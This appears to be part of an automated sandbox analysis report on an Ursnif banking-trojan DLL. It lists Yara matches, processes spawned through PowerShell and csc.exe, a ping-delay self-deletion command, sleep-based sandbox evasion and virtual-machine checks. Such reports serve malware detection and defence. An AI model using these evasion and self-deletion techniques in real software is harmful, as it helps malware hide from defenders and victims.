                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: VoevdOQpeU.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.370646090.0000000005D90000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: loaddll32.exe, 00000000.00000000.287938913.0000000000480000.00000002.00000001.01000000.00000003.sdmp, VoevdOQpeU.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.370646090.0000000005D90000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049FB2FF push esi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F820B push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F7E20 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05812C1A push ecx; mov dword ptr [esp], 00000002h
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_058237E3 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_058232B0 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0580A513 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: bscdh0f0.dll.28.drStatic PE information: real checksum: 0x0 should be: 0x5d5f
                      Source: poet0yxq.dll.26.drStatic PE information: real checksum: 0x0 should be: 0xdf1c
                      Source: VoevdOQpeU.dllStatic PE information: real checksum: 0x872fe521 should be: 0xab1d3
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.260779553.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.308220825.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.260884971.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.309153947.0000000004D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.306041676.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261032532.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261191379.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.260987111.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261105592.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261071181.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261177888.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5292, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6612, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.48994a0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.49f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.48994a0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4e7a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f26940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4ef94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4e7a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.307999471.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.418290264.0000000004899000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.307957841.0000000004E7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.420929959.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Self deletion via cmd delete
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\VoevdOQpeU.dll
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\VoevdOQpeU.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Uses ping.exe to sleep
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6764Thread sleep time: -10145709240540247s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5717
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3615
                      Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0580FCC0 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0580CE21 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05805A14 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0580591B wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
                      Source: explorer.exe, 00000021.00000000.427438325.00000000051AC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                      Source: explorer.exe, 00000021.00000000.427485687.00000000051D2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}71USER
                      Source: explorer.exe, 00000021.00000000.385694451.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                      Source: explorer.exe, 00000021.00000000.384966300.0000000005EAB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000021.00000000.383500997.000000000510C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000021.00000000.427485687.00000000051D2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: explorer.exe, 00000021.00000000.385694451.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
